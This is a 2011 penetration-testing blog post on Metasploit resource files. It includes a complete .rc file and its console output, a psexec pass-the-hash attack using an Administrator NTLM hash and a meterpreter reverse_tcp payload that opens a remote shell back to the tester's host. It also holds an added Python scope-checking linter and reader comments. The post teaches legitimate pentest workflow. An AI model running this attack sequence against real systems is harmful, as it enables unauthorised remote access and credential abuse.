Metasploit resource files
Mar 21, 2011
Metasploit has a handy feature that allows you to load settings from a file, which lets us create easily repeatable configurations. When pen testing I like to create a directory structure, keeping notes and tool output in plain text files, and I find it useful to create and store the Metasploit config files alongside them.
The directory structure would look something like this:
Within the 230_psexec.rc file I would enter the commands I would issue in metasploit to recreate the exploit used against a specific vulnerability (in this case, reuse of passwords across various targets).
The contents of 230_psexec.rc looks like this:
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.182
set RHOST 192.168.1.230
set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
set SMBUser Administrator
exploit
We can either start metasploit and run these commands right away using the command:
msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc
or use the command ‘resource’ within msfconsole like this:
msf> resource /root/2011-03-21_acme/192.168/1/230/230_psexec.rc
Our output would look like this:
root@bt:~# msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 653 exploits - 343 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11970 updated 5 days ago (2011.03.15)
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> use windows/smb/psexec
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> setg LHOST 192.168.1.182
LHOST => 192.168.1.182
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set RHOST 192.168.1.230
RHOST => 192.168.1.230
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
SMBPass => aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> exploit
[*] Started reverse handler on 192.168.1.182:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.230:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TwLkuthH.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (dcZDWuwa - "MluCkfMYLQRNHpqECJiJY")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.230
[*] Closing service handle...
[*] Deleting \TwLkuthH.exe...
[*] Meterpreter session 1 opened (192.168.1.182:4444 -> 192.168.1.230:49305) at Sun Mar 20 23:45:20 +0000 2011
meterpreter >
You can also now add Ruby scripts into the .rc files. I have yet to play around with these but can imagine some very useful scripts; I will write more once I have tried them out.
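Because a resource file replays every command without asking, it is worth checking that it only targets the host its directory says it should before running it. The Python linter below is an added example (not Metasploit code and not from the original post): it parses the one-command-per-line .rc format, skipping any <ruby>...</ruby> blocks, and flags any RHOST/RHOSTS outside the scope implied by the path layout; the layout convention, the sample file and the function names are assumptions.

```python
# Lint a Metasploit resource file before running it: parse the one-command-per-line format
# (skipping <ruby>...</ruby> blocks) and check every RHOST/RHOSTS against the directory scope.
import ipaddress
import re

def parse_rc(text):
    """Return (module, {OPTION: value}, ruby_block_count); raise on unterminated <ruby>."""
    module, options, ruby_blocks, in_ruby = None, {}, 0, False
    for raw in text.splitlines():
        line = raw.strip()
        if in_ruby:                       # inline Ruby is opaque to the linter; just count it
            in_ruby = line != "</ruby>"
        elif line == "<ruby>":
            in_ruby, ruby_blocks = True, ruby_blocks + 1
        elif line and not line.startswith("#"):
            parts = line.split(None, 2)   # 'set KEY value with spaces' -> 3 parts
            if parts[0] == "use" and len(parts) > 1:
                module = parts[1]
            elif parts[0] in ("set", "setg") and len(parts) == 3:
                options[parts[1].upper()] = parts[2]
    if in_ruby:
        raise ValueError("unterminated <ruby> block")
    return module, options, ruby_blocks

def scope_from_path(rc_path):
    """Target implied by the assumed .../A.B/C/D/<file>.rc layout, e.g. 192.168/1/230 -> 192.168.1.230/32."""
    return ipaddress.ip_network(".".join(rc_path.split("/")[-4:-1]))

def check_scope(text, rc_path, extra_scope=()):
    """Return a list of problems; an empty list means every target is in scope."""
    module, opts, ruby_blocks = parse_rc(text)
    nets = [scope_from_path(rc_path)] + [ipaddress.ip_network(n) for n in extra_scope]
    problems = [] if module else ["no 'use' line"]
    for key in ("RHOST", "RHOSTS"):
        for host in filter(None, re.split(r"[\s,]+", opts.get(key, ""))):
            try:
                addr = ipaddress.ip_address(host)
            except ValueError:            # hostnames cannot be checked against CIDR scope
                problems.append(f"{key} {host!r} is not an IP literal")
                continue
            if not any(addr in net for net in nets):
                problems.append(f"{key} {host} is outside scope {[str(n) for n in nets]}")
    if ruby_blocks:
        problems.append(f"{ruby_blocks} <ruby> block(s) present and not checked")
    return problems

# Constructed sample mirroring the post's 230_psexec.rc (credential lines omitted).
SAMPLE_RC = ("use windows/smb/psexec\nset PAYLOAD windows/meterpreter/reverse_tcp\n"
             "setg LHOST 192.168.1.182\nset RHOST 192.168.1.230\nexploit\n")
SAMPLE_PATH = "/root/2011-03-21_acme/192.168/1/230/230_psexec.rc"
```

Running `check_scope(SAMPLE_RC, SAMPLE_PATH)` returns an empty list; changing the RHOST to a neighbouring address, or pointing the file at the wrong directory, produces an "outside scope" entry.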
Reader Comments (3)
Is it possible to save the results from commands run through a .rc file to a text file? Say the .rc file runs sysinfo, getuid, etc... Can the output automatically be saved to a text file? Thanks.
Yes you can use winenum and this will store the results locally in your home directory. There is also some good meterpreter post exploitation automation info here http://www.darkoperator.com/blog/2011/7/13/automating-post-modules-and-meterpreter-across-sessions.html
Thank you Sam, my script is now using winenum. I also found that you can use the linux command 'script' to log everything from the terminal. Furthermore, MSF has the spool command that's supposed to save all the input/output, but it does NOT work as stated.